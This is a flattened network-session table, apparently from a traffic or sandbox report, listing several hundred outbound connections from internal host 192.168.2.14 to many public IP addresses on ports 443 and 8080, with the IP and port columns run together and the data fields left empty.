                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12175192.168.2.144815261.150.53.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12176192.168.2.1436432203.97.81.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12177192.168.2.144229482.68.18.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12178192.168.2.1435536115.106.214.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12179192.168.2.1457120136.51.228.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12180192.168.2.1450476173.13.104.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12181192.168.2.144211493.119.167.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12182192.168.2.1433894158.178.232.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12183192.168.2.144440678.180.210.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12184192.168.2.145544649.126.62.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12185192.168.2.1449848128.109.160.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12186192.168.2.1453662101.207.101.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12187192.168.2.1437758154.215.80.2138080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12188192.168.2.1460922156.238.15.718080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12189192.168.2.144349244.192.68.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12190192.168.2.144850071.59.45.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12191192.168.2.143597838.29.113.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12192192.168.2.1458378145.231.182.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12193192.168.2.144197842.212.173.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12194192.168.2.1452386147.147.64.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12195192.168.2.1442480201.118.188.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12196192.168.2.1460364183.128.120.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12197192.168.2.1433144184.144.124.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12198192.168.2.144061693.212.189.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12199192.168.2.1443694217.181.168.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12200192.168.2.1436660204.21.155.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12201192.168.2.143857490.32.16.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12202192.168.2.1449564134.1.49.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12203192.168.2.144687818.98.36.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12204192.168.2.143417499.90.55.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12205192.168.2.1442806140.41.191.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12206192.168.2.1442458152.125.16.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12207192.168.2.1441238189.128.53.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12208192.168.2.144968825.170.11.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12209192.168.2.1447502220.167.20.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12210192.168.2.143362417.54.83.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12211192.168.2.144089673.231.102.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12212192.168.2.145407079.214.215.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12213192.168.2.1453296220.169.22.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12214192.168.2.143794043.218.97.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12215192.168.2.1448486208.130.37.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12216192.168.2.1437474193.118.85.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12217192.168.2.1458254162.196.214.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12218192.168.2.1453822145.171.24.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12219192.168.2.14425384.39.153.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12220192.168.2.144081027.124.32.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12221192.168.2.144324014.119.71.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12222192.168.2.143807646.89.197.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12223192.168.2.1436160116.208.224.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12224192.168.2.1458358120.194.156.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12225192.168.2.1439354179.50.100.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12226192.168.2.1435488153.14.85.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12227192.168.2.144317050.183.154.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12228192.168.2.145083663.59.82.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12229192.168.2.144952025.31.95.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12230192.168.2.145757683.157.134.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12231192.168.2.144003869.164.183.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12232192.168.2.144928477.130.143.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12233192.168.2.143351472.228.148.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12234192.168.2.1437592154.195.38.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12235192.168.2.1452464106.74.146.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12236192.168.2.1435380175.183.53.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12237192.168.2.14505862.135.155.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12238192.168.2.144017852.0.3.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12239192.168.2.1447368205.2.13.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12240192.168.2.1437556180.249.58.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12241192.168.2.1439396146.166.207.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12242192.168.2.145060424.241.92.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12243192.168.2.144212262.119.159.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12244192.168.2.1451926165.84.204.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12245192.168.2.143413217.13.123.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12246192.168.2.145375452.83.96.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12247192.168.2.1448824217.112.203.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12248192.168.2.1446892217.117.41.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12249192.168.2.145691079.30.173.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12250192.168.2.144565277.96.132.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12251192.168.2.1450704107.158.146.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12252192.168.2.1450568223.42.191.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12253192.168.2.1454442206.9.33.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12254192.168.2.1433058218.208.96.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12255192.168.2.1446814161.27.90.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12256192.168.2.143537299.52.11.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12257192.168.2.144971872.94.13.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12258192.168.2.144490865.211.151.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12259192.168.2.144056842.158.81.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12260192.168.2.1445092155.126.141.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12261192.168.2.1436308216.229.138.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12262192.168.2.1444302102.98.145.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12263192.168.2.14514605.117.60.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12264192.168.2.1441764194.174.182.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12265192.168.2.144945687.119.210.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12266192.168.2.1459540196.33.82.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12267192.168.2.1435568193.93.130.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12268192.168.2.1453844180.202.179.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12269192.168.2.1444224117.2.212.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12270192.168.2.14515265.22.254.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12271192.168.2.144686680.104.238.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12272192.168.2.1454232196.241.192.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12273192.168.2.1437184223.92.253.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12274192.168.2.145781050.38.6.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12275192.168.2.143479241.84.129.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12276192.168.2.144726057.192.241.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12277192.168.2.1442178120.83.58.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12278192.168.2.1439730147.160.241.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12279192.168.2.1433638167.211.131.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12280192.168.2.1445158151.73.150.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12281192.168.2.143282482.247.132.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12282192.168.2.1444360178.212.73.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12283192.168.2.14429245.122.131.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12284192.168.2.144570647.104.42.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12285192.168.2.1453996186.3.114.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12286192.168.2.1446004164.188.116.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12287192.168.2.1449114183.138.140.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12288192.168.2.146018290.169.51.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12289192.168.2.1455222202.17.225.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12290192.168.2.1446492116.140.19.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12291192.168.2.144983885.80.155.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12292192.168.2.1444404126.7.121.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12293192.168.2.145812837.163.11.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12294192.168.2.145845089.174.88.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12295192.168.2.143606412.53.2.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12296192.168.2.144594825.192.249.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12297192.168.2.1445182132.211.221.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12298192.168.2.1444412165.2.174.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12299192.168.2.144014681.94.164.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12300192.168.2.1446404119.0.154.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12301192.168.2.1447442104.177.65.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12302192.168.2.1440878185.161.103.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12303192.168.2.1448432111.81.11.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12304192.168.2.1457768107.240.25.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12305192.168.2.144638465.91.152.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12306192.168.2.14412105.192.252.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12307192.168.2.144761625.44.216.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12308192.168.2.144687439.223.163.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12309192.168.2.1449012156.130.224.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12310192.168.2.145441674.3.188.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12311192.168.2.145566292.217.12.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12312192.168.2.1459618191.133.173.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12313192.168.2.1441186172.143.90.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12314192.168.2.1446276218.28.90.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12315192.168.2.1439406138.223.195.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12316192.168.2.1447986129.157.66.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12317192.168.2.1456702193.79.55.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12318192.168.2.1456966119.199.26.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12319192.168.2.1447246198.74.65.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12320192.168.2.1448552134.62.115.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12321192.168.2.1435446140.214.105.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12322192.168.2.14417664.32.156.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12323192.168.2.1434518222.107.240.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12324192.168.2.1442388111.234.200.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12325192.168.2.144421460.5.37.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12326192.168.2.1436152183.188.227.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12327192.168.2.144313885.231.39.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12328192.168.2.1451468145.254.223.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12329192.168.2.1447544109.212.81.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12330192.168.2.146083446.16.24.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12331192.168.2.143800213.250.253.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12332192.168.2.1455184189.33.79.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12333192.168.2.1452160179.114.7.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12334192.168.2.1435444217.165.15.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12335192.168.2.143810840.176.135.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12336192.168.2.1438776120.55.206.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12337192.168.2.144426071.21.250.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12338192.168.2.1437150184.41.163.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12339192.168.2.1453442151.227.165.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12340192.168.2.1448532173.71.243.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12341192.168.2.143797223.70.246.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12342192.168.2.144996068.30.72.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12343192.168.2.144408037.118.156.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12344192.168.2.145574224.208.214.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12345192.168.2.1445288152.11.79.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12346192.168.2.143361240.199.46.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12347192.168.2.1455466137.137.166.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12348192.168.2.1452292142.90.227.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12349192.168.2.145633857.4.156.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12350192.168.2.1447842204.34.254.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12351192.168.2.146070013.129.234.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12352192.168.2.1452010175.56.198.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12353192.168.2.144798481.194.29.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12354192.168.2.1447316133.230.49.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12355192.168.2.1451936116.118.252.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12356192.168.2.145816014.62.253.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12357192.168.2.145772268.214.203.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12358192.168.2.1448832204.141.101.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12359192.168.2.1434310189.78.6.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12360192.168.2.1449676173.167.111.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12361192.168.2.1436778176.198.169.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12362192.168.2.1455460175.176.234.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12363192.168.2.1443298203.16.157.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12364192.168.2.1447158126.4.4.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12365192.168.2.1448018212.60.198.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12366192.168.2.144916850.163.193.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12367192.168.2.145037664.159.59.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12368192.168.2.143473057.211.80.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12369192.168.2.144108469.138.97.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12370192.168.2.1440210196.85.242.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12371192.168.2.144805281.142.226.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12372192.168.2.1445624115.244.47.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12373192.168.2.144938637.81.96.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12374192.168.2.1454744136.162.249.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12375192.168.2.1460208211.94.172.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12376192.168.2.1460342205.14.46.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12377192.168.2.14522381.76.167.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12378192.168.2.1438532206.76.216.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12379192.168.2.143673642.81.199.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12380192.168.2.1438122157.174.134.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12381192.168.2.1459446151.75.212.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12382192.168.2.1445810132.61.104.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12383192.168.2.1451262172.210.189.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12384192.168.2.1450462192.87.59.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12385192.168.2.145788088.25.7.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12386192.168.2.1458342185.106.33.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
